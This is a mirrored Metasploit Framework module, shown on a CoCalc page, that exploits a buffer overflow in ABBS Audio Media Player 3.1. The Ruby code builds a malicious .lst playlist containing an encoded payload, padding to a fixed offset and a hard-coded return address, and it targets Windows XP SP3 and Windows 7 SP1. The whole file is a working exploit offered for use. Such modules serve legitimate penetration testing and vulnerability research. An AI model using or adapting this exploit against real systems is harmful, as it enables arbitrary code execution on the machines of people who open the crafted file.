CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/abbs_amp_lst.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::FILEFORMAT

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'ABBS Audio Media Player .LST Buffer Overflow',

14
      'Description'    => %q{

15
          This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability

16
        occurs when adding a specially crafted .lst file, allowing arbitrary code execution with the privileges

17
        of the user running the application. This module has been tested successfully on

18
        ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.

19
      },

20
      'License'        => MSF_LICENSE,

21
      'Author'         =>

22
        [

23
          'Julian Ahrens', # Vulnerability discovery and PoC

24
          'modpr0be <modpr0be[at]spentera.com>' # Metasploit module

25
        ],

26
      'References'     =>

27
        [

28
          [ 'OSVDB', '75096' ],

29
          [ 'EDB', '25204' ]

30
        ],

31
      'DefaultOptions'  =>

32
        {

33
          'EXITFUNC' => 'process',

34
        },

35
      'Platform'       => 'win',

36
      'Payload'        =>

37
        {

38
          'BadChars'        => "\x00\x0a\x0d",

39
          'DisableNops'     => true,

40
        },

41
      'Targets'        =>

42
        [

43
          [ 'ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1',

44
            {

45
              'Ret'     => 0x00412c91, # add esp,14 # pop # pop # pop # ret from amp.exe

46
              'Offset'  => 4108,

47
            }

48
          ]

49
        ],

50
      'Privileged'     => false,

51
      'DisclosureDate' => '2013-06-30',

52
      'DefaultTarget'  => 0))

53


54
    register_options(

55
      [

56
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.lst']),

57
      ])

58


59
  end

60


61
  def exploit

62
    buffer = payload.encoded

63
    buffer << rand_text(target['Offset'] - (payload.encoded.length))

64
    buffer << [target.ret].pack('V')

65


66
    file_create(buffer)

67
  end

68
end

69


70